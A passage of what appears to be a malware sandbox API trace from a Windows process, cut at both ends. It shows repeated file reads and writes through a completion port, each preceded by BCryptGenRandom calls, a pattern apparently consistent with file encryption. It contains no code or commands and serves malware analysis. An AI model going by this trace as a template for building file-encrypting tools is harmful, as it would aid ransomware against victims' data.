lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.421] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.438] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x60f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.438] CloseHandle (hObject=0x3c4) returned 1 [0079.440] free (_Block=0x1fb18c0) [0079.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.453] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.453] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.453] free (_Block=0x1ff1e60) [0079.453] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.453] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.453] free (_Block=0x1ff1e60) [0079.453] free (_Block=0x1ff1930) [0079.453] free (_Block=0x77d800) [0079.453] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.455] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.455] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.474] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xcc1b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.494] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x2c432, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.496] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.513] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x2c44a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.532] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x39ef2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.535] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.537] CloseHandle (hObject=0x3c4) returned 1 [0079.544] free (_Block=0x1fb18c0) [0079.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.561] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.563] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.563] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.563] free (_Block=0x1ff1e60) [0079.563] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.563] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.563] free (_Block=0x1ff1e60) [0079.563] free (_Block=0x1ff1930) [0079.563] free (_Block=0x77d800) [0079.563] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.564] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.587] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.587] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.587] free (_Block=0x1ff1e60) [0079.587] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.587] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.588] free (_Block=0x1ff1e60) [0079.588] free (_Block=0x1ff1930) [0079.588] free (_Block=0x77d800) [0079.588] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0079.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.603] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.608] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.608] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.608] free (_Block=0x77d800) [0079.608] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0079.608] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0079.609] free (_Block=0x1ff1930) [0079.609] free (_Block=0x1ff1a40) [0079.609] free (_Block=0x77d908) [0079.609] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0079.609] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.624] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.630] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.630] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.630] free (_Block=0x77d800) [0079.630] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0079.630] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0079.630] free (_Block=0x3db00b8) [0079.630] free (_Block=0x3db01c8) [0079.630] free (_Block=0x77d908) [0079.631] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.631] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.638] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.639] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.639] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.639] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.643] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.643] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.643] free (_Block=0x77d800) [0079.643] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0079.643] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0079.644] free (_Block=0x3db00b8) [0079.644] free (_Block=0x3db01c8) [0079.644] free (_Block=0x77d908) [0079.644] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0079.802] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.803] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.803] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.803] free (_Block=0x1ff1e60) [0079.803] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.804] calloc (_Count=0x82, _Size=0x4) returned 0x3e30078 [0079.804] free (_Block=0x1ff1e60) [0079.804] free (_Block=0x3e30078) [0079.804] free (_Block=0x77d800) [0079.804] WriteFile (in: hFile=0x3c4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0079.804] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.806] WriteFile (in: hFile=0x3c4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb8d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0079.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.810] CloseHandle (hObject=0x3c4) returned 1 [0079.810] free (_Block=0x3df0008) [0079.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.823] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.824] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.824] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.825] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.825] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.825] free (_Block=0x1ff1e60) [0079.825] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.825] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.825] free (_Block=0x1ff1e60) [0079.825] free (_Block=0x1ff1930) [0079.825] free (_Block=0x77d800) [0079.825] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.826] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.828] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x12da0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.829] CloseHandle (hObject=0x3c4) returned 1 [0079.830] free (_Block=0x1fb18c0) [0079.830] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.842] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.842] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.842] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.842] free (_Block=0x1ff1e60) [0079.842] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.843] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.843] free (_Block=0x1ff1e60) [0079.843] free (_Block=0x1ff1930) [0079.843] free (_Block=0x77d800) [0079.843] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.844] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.846] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x14ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.847] CloseHandle (hObject=0x3c4) returned 1 [0079.847] free (_Block=0x1fb18c0) [0079.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.859] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.859] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.859] free (_Block=0x1ff1e60) [0079.859] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.859] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.860] free (_Block=0x1ff1e60) [0079.860] free (_Block=0x1ff1930) [0079.860] free (_Block=0x77d800) [0079.860] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.863] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x26620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.866] CloseHandle (hObject=0x3c4) returned 1 [0079.866] free (_Block=0x1fb18c0) [0079.866] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.878] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.878] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.878] free (_Block=0x1ff1e60) [0079.878] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.878] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.879] free (_Block=0x1ff1e60) [0079.879] free (_Block=0x1ff1930) [0079.879] free (_Block=0x77d800) [0079.879] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.879] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.881] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x28560, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: 